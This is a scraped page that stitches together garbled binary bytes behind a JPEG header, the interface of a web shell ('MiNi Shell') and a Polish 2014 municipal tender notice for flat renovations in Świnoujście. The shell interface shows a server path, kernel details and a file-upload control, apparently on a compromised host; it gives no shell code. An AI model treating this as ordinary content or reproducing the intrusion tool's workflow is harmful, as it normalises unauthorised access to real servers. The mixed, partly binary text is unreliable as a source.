JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/49813-N-2014.html

<p class="kh_header"><b>Świnoujście: Wykonanie prac remontowych w lokalach mieszkalnych położonych w Świnoujściu przy ul.Krzywej 1e/60 i przy ul.Krzywej 1a/48</b><br>
<b>Numer ogłoszenia: 49813 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Monte Cassino 8, 72-600 Świnoujście, woj. zachodniopomorskie, tel. 91 3212280, 3212631 w. 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zgm.swinoujscie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac remontowych w lokalach mieszkalnych położonych w Świnoujściu przy ul.Krzywej 1e/60 i przy ul.Krzywej 1a/48.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace remontowe w lokalach  mieszkalnych położonych 
w Świnoujściu przy ul. Krzywej 1e/60 i przy ul. Krzywej 1a/48 zgodnie z załączonymi szczegółowymi zakresami prac remontowych stanowiącymi załączniki nr 1 i 1a do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-0, 45.33.00.00-0, 45.40.00.00-0, 45.41.00.00-0, 45.42.00.00-0, 45.43.00.00-0, 45.44.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy posiadają doświadczenie zawodowe w wykonywaniu tego typu prac tzn. Wykonawcy, którzy wykażą, że w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali należycie co najmniej dwa zamówienia odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia, tj. wykonali roboty remontowe o wartości brutto min. 30 tys. zł każda - warunki dotyczą każdej oferty częściowej z osobna (zał. nr 3 i 3 a do SIWZ);
 Na potwierdzenie spełnienia tego warunku Wykonawca przedstawi wykaz wykonanych 2 robót z podaniem ich zakresu, wartości oraz daty i miejsca wykonania oraz dokument potwierdzający ich należyte wykonanie do każdej składanej oferty częściowej. (zał. nr 3 i 3 a do SIWZ);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy, którzy dysponują osobami posiadającymi odpowiadające specyfice prac uprawnienia budowlane do kierowania robotami budowlanymi oraz posiadającymi co najmniej 2-letnią praktykę zawodową w tego typu pracach (zał. nr 4 i 4a do SIWZ);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy, którzy udzielą co najmniej:
- 36 - miesięcznej gwarancji na robociznę na wykonane prace remontowo - budowlane, sanitarne i elektryczne;
- gwarancji zgodnej z gwarancją producentów na materiały, wbudowane urządzenia, stolarkę okienną i drzwiową;
2. Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
3. Wykonawcy, którzy wypełnili oraz podpisali formularz ofertowy (zał. nr 6 i 6a do SIWZ).
4. Oświadczenie Wykonawcy - według zał. nr 2 i 2a do SIWZ.
5. Wykaz prac oraz dokumenty potwierdzające ich należyte wykonanie na co najmniej
6 roboty remontowo - budowlane związane z wykonywaniem tego typu zamówienia w okresie ostatnich 5 lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie (wg zał. nr 3 i 3a do SIWZ).
7. Oferta (Zamawiający zaleca sporządzenie oferty  według wzoru formularza oferty - zał. nr 6 i 6a do SIWZ).
8. Upoważnienie osoby podpisującej ofertę (gdy nie wynika to z treści innych dokumentów załączonych do oferty).
9. Lista podmiotów należących do tej samej grupy kapitałowej, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (wg zał. nr 8 i 8a do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zgm.swinoujscie.pl/ OGŁOSZENIA/PRZETARGI > Zamówienia Publiczne - przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest na stronie internetowej i w wersji papierowej ( odbiór osobisty) w Zakładzie Gospodarki Mieszkaniowej ul. Monte Cassino 8,pokój nr 30,bądź przesyłką za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 10:00, miejsce: Zakład Gospodarki Mieszkaniowej ul. Monte Cassino 8 - sekretariat, codziennie z wyjątkiem sobót, niedziel i dni wolnych od pracy w godzinach 7.30 do 15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I oferta częściowa - wykonanie  prac remontowych w lokalu mieszkalnym położonym 
w Świnoujściu przy ul. Krzywej 1e/60.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - dla części I zamówienia - dot. lokalu  mieszkalnego położonego przy ul. Krzywej 1e/60 
1) wymiana osprzętu elektrycznego w mieszkaniu (gniazda i wyłączniki, sprawdzenie i ewentualna wymiana zabezpieczeń),
2) przygotowanie instalacji gazowej do głównej próby szczelności,
3) wyczyszczenie,  naprawa i  regulacja drzwi wejściowych  do  mieszkania  z  umocowaniem ościeżnicy  drzwiowej  -  szt 1, 
4) wymiana  stolarki  okiennej wraz  z  montażem  nawiewników  (minimalna  przepustowość nawiewników 25 m3/h) -  szt 2,
5) oszklenie, naprawa, dopasowanie stolarki drzwiowej wewnątrzlokalowej wraz  z uzupełnieniem  okuć (klamki, szyldy, zamki) - szt 3, 
6) oszklenie okienka wewnętrznego pomiędzy kuchnią  a pokojem - szt 1,
7) zerwanie wykładziny podłogowej w lokalu,
8) wykonanie warstwy wyrównawczej  posadzek (o parametrach nie gorszych, zbliżonych lub równoważnych do produktów firmy ATLAS) - konieczność zgłoszenia Zamawiającemu wykonania ww. prac,
9)  ułożenie paneli podłogowych (8 mm klasa AC 4) wraz z listwami przyściennymi w pokojach i przedpokoju,
10)  ułożenie terakoty wraz z cokolikami w kuchni i łazience,
11) szpachlowanie  tynków sufitów oraz ścian, 
12)  ułożenie fartuchów glazury w kuchni i łazience (wanna i umywalka). Uszczelnienie urządzeń za glazurą należy przewidzieć wyłącznie z użyciem silikonu. Fartuchy glazury winny być ułożone z  30 cm  naddatkiem za urządzeniem, 
13) wymiana urządzeń sanitarnych: 
    a) miska ustępowa typu kompakt, sedes, spłuczka, wężyki,
    b) zlewozmywak, bateria zlewozmywakowa, syfon, szafka pod zlewozmywak - typowa,
    c) kuchenka gazowa 4 palnikowa z zabezpieczeniami przeciw wypływowymi oraz  piekarnikiem i przyłączem elastycznym ok. 1m o parametrach nie gorszych lub równoważnych do kuchenek firmy  AMICA,  
    d) baterii  umywalkowej, 
    e) baterii wannowej,
    f) biały montaż o parametrach równoważnych lub zbliżonych do produktów firmy np. KOŁO armatura nie gorsza niż produkty firmy DIAMOND - lub równoważna,
14) wymiana zamka w skrzynce na listy, dorobienie klucza do wiatrołapu,
15)  wymiana kratek wentylacyjnych -  szt 2,
16)  montaż termostatycznych  głowic do zaworów grzejnikowych  - szt 3,
17) domycie wanny,
18)  dwukrotne malowanie farbą emulsyjną ścian i sufitów,
19) sprawdzenie i ewentualna naprawa  instalacji domofonowej wymiana słuchawki wraz z ustaleniem kodu domofonu do lokalu,
20)  prace towarzyszące.

Uwaga: 
Wszystkie wskazane z nazwy wyroby/materiały użyte do wykonania prac należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza składanie ofert równoważnych z tym zastrzeżeniem, że uwzględnione w wycenie produkty nie odbiegają jakością, standardem i parametrami technicznymi od założonych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-0, 45.33.00.00-0, 45.40.00.00-0, 45.41.00.00-0, 45.42.00.00-0, 45.43.00.00-0, 45.44.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II oferta częściowa - wykonanie  prac remontowych w lokalu mieszkalnym położonym 
w Świnoujściu przy ul. Krzywej 1a/48.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - dla części II zamówienia - dot. lokalu  mieszkalnego położonego przy ul. Krzywej 1a/48 (załącznik nr 1a do SIWZ):
1) naprawa i sprawdzenie instalacji elektrycznej wraz z wymianą osprzętu elektrycznego 
w mieszkaniu (gniazda i wyłączniki odcinki przewodów, sprawdzenie i ewentualna wymiana zabezpieczeń),
2) przygotowanie instalacji gazowej do głównej próby szczelności,
3) wymiana drzwi wejściowych do mieszkania (drzwi antywłamaniowe, metalowe, malowane proszkowo, wypełnione   pianką poliuretanową wraz z ościeżnicą)  - szt 1,
4) montaż nawiewników okiennych (minimalna przepustowość nawiewników 25 m3/h)- szt 6,                      
5) naprawa, dopasowanie, malowanie farbą olejną  stolarki drzwiowej  wewnątrzlokalowej wraz z  uzupełnieniem  okuć (klamki, szyldy, zamki) -  szt 6,
6)  zerwanie terakoty w kuchni i części przedpokoju  oraz paneli w pokoju i części przedpokoju,
7) zerwanie wykładzin PCV w pozostałych pokojach -   szt 3,
8) wykonanie warstwy wyrównawczej  posadzek (o parametrach nie gorszych, zbliżonych lub równoważnych do produktów firmy ATLAS) - konieczność zgłoszenia  Zamawiającemu wykonania ww. prac,
9) ułożenie paneli podłogowych (8 mm klasa AC 4) wraz z listwami przyściennymi 
w pokojach i przedpokoju, (pomieszczenia odcinać listwami progowymi aluminiowymi),
10) ułożenie terakoty wraz z cokolikami w kuchni,
11) umycie glazury i terakoty w łazience, oraz w kuchni - fartuch,
12) szpachlowanie  tynków sufitów oraz ścian, 
13) wymiana urządzeń sanitarnych: 
    a) miska ustępowa typu kompakt, sedes, spłuczka, wężyki,
    b) zlewozmywak, bateria zlewozmywakowa, syfon, szafka pod zlewozmywak - typowa,
    c) kuchenka gazowa 4 palnikowa z zabezpieczeniami przeciw wypływowymi oraz piekarnikiem i przyłączem elastycznym ok. 1m o parametrach nie gorszych lub równoważnych do kuchenek firmy  AMICA,  
    d) baterii  umywalkowej w wc,
    e) wanny wraz z syfonem i baterią wannową,
    f) biały montaż o parametrach równoważnych lub zbliżonych do produktów firmy np. KOŁO armatura nie gorsza niż produkty firmy DIAMOND - lub równoważna,
14) wymiana zamka w skrzynce na listy, dorobienie klucza do wiatrołapu,
15) wymiana kratek wentylacyjnych - szt 3,
16) montaż termostatycznych głowic do zaworów grzejnikowych -  szt 3,
17) dorobienie drzwiczek do szachtów  wodnych - szt 2 - wielkość drzwiczek winna umożliwiać sprawną wymianę wodomierzy,
18) wymiana kratek nawiewnych w drzwiach do łazienki i w.c.  -  szt 2,
19) dwukrotne malowanie farbą emulsyjną ścian i sufitów,
20) sprawdzenie i ewentualna naprawa  instalacji domofonowej wymiana słuchawki wraz 
z ustaleniem kodu domofonu do lokalu,
21) prace towarzyszące.

Uwaga: 

Wszystkie wskazane z nazwy wyroby/materiały użyte do wykonania prac należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Zamawiający dopuszcza składanie ofert równoważnych z tym zastrzeżeniem, że uwzględnione w wycenie produkty nie odbiegają jakością, standardem i parametrami technicznymi od założonych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-0, 45.33.00.00-0, 45.40.00.00-0, 45.41.00.00-0, 45.42.00.00-0, 45.43.00.00-0, 45.44.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com